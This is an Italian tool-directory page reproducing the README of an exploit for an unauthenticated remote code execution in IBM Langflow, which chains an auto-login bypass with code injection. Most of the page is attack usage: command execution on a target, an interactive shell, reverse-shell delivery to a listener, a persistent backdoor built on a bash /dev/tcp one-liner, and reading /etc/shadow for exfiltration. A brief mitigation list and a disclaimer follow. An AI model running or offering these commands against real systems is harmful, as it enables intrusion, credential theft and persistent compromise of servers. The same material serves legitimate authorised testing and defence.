Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-9198 — IBM Langflow RCE non autenticata tramite bypass del login automatico | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
Generazione di PayloadExploitSfruttamento di Applicazioni WebCommand and ControlAutenticazioneRed TeamingStrumento di Accesso Remoto
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow RCE non autenticata tramite bypass del login automatico

Vedi Repository
111 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Logo Langflow

🚨 CVE-2026-9198

IBM Langflow OSS RCE non autenticata tramite bypass del login automatico

License: MIT Python 3.6+ Security


📋 Panoramica

CVE-2026-9198 è una vulnerabilità critica di Remote Code Execution (RCE) non autenticata in IBM Langflow OSS. Questo exploit combina due vulnerabilità:

  • CVE-2026-9103: Bypass del login automatico che concede token JWT di superutente a chiamanti non autenticati
  • CVE-2026-8481: Iniezione di codice nell'endpoint /api/v1/validate/code che consente l'esecuzione arbitraria di codice Python

⚠️ AVVERTENZA: Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a scopi didattici. L'uso non autorizzato è illegale.


🚀 Caratteristiche

  • 🔓 Bypass del login automatico - Ottiene automaticamente il token JWT di superutente
  • 💻 Pseudo-shell interattiva - Prompt dinamico con nome utente e directory corrente
  • 📝 Esecuzione di un singolo comando - Esegue comandi di sistema arbitrari
  • 🔄 Reverse shell - Consegna di payload reverse shell in una sola riga
  • 🎨 Output colorato - Feedback visivo con colori ANSI
  • ⚡ Veloce e affidabile - Realizzato con una gestione degli errori robusta

📦 Installazione

Prerequisiti

  • Python 3.6 o superiore
  • Gestore di pacchetti pip

Passaggio 1: Clonare il repository

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

Passaggio 2: Installare le dipendenze

root@kitploit:~
pip install termcolor

Oppure installa tutte le dipendenze in una volta:

root@kitploit:~
pip install -r requirements.txt

Passaggio 3: Verificare l'installazione

root@kitploit:~
python CVE-2026-9198.py --help

Dovresti vedere il menu di aiuto con tutte le opzioni disponibili.


🎯 Utilizzo

Esecuzione di un singolo comando

Esegue un singolo comando sul target:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

Esempio:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

Pseudo-shell interattiva

Avvia una shell interattiva con prompt dinamici:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

Caratteristiche:

  • Prompt dinamico che mostra user@host e la directory corrente
  • Supporto del comando cd con aggiornamento automatico del prompt
  • Cronologia dei comandi (a seconda del terminale)
  • Formattazione pulita dell'output

Esempio di sessione:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

Reverse shell

Invia un payload reverse shell a un listener:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

Esempio:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

Porta personalizzata

Se Langflow è in esecuzione su una porta non predefinita:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

Esempio:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

Utilizzo di un token già ottenuto

Salta il processo di login automatico e utilizza un token esistente:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

Configurazione del timeout

Regola il timeout HTTP per reti più lente:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 Argomenti della riga di comando

ArgomentoDescrizioneObbligatorioPredefinito
-t, --targetHost/IP di destinazione o URL completo✅ Sì-
-p, --portPorta di Langflow❌ No7860
-c, --cmdEsegue un singolo comando❌ No"id"
--shellModalità pseudo-shell interattiva❌ NoFalse
--lhostIP del listener della reverse shell❌ No-
--lportPorta del listener della reverse shell❌ No4444
-k, --tokenUtilizza il token bearer fornito❌ No-
--timeoutTimeout HTTP in secondi❌ No20
--no-bannerNasconde il banner❌ NoFalse

🔧 Esempi

1. Raccolta di informazioni di base

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. Esplorazione del file system

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. Backdoor persistente

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. Scansione della rete (dal target)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. Esfiltrazione di file sensibili

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ Mitigazione

Per proteggersi da questa vulnerabilità:

  1. Disattiva il login automatico negli ambienti di produzione
  2. Applica le patch rilasciate da IBM per Langflow
  3. Limita l'accesso di rete alle interfacce amministrative di Langflow
  4. Monitora le richieste API anomale verso /api/v1/auto_login e /api/v1/validate/code
  5. Utilizza regole WAF per bloccare i pattern di payload sospetti

⚠️ Disclaimer

Questo strumento è fornito esclusivamente a scopo didattico e per test di sicurezza autorizzati. L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo software. Gli utenti sono gli unici responsabili del rispetto delle leggi e dei regolamenti applicabili.


📄 Licenza

Questo progetto è distribuito con licenza MIT - consulta il file LICENSE per i dettagli.


👨‍💻 Autore

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • Ricercatore di sicurezza e Pentester

📚 Riferimenti

  • Dettagli CVE-2026-9198
  • CVE-2026-9103 - Bypass del login automatico
  • CVE-2026-8481 - Iniezione di codice
  • Sito ufficiale di Langflow

🤝 Contributi

I contributi sono benvenuti! Sentiti libero di inviare una Pull Request.

  1. Fai il fork del repository
  2. Crea il tuo branch per la funzionalità (git checkout -b feature/AmazingFeature)
  3. Esegui il commit delle tue modifiche (git commit -m 'Add some AmazingFeature')
  4. Esegui il push sul branch (git push origin feature/AmazingFeature)
  5. Apri una Pull Request

⭐ Storico delle stelle

Se trovi utile questo strumento, considera di lasciare una ⭐ su GitHub!


Fatto con ❤️ da 0xgh057r3c0n
Scarica lo strumento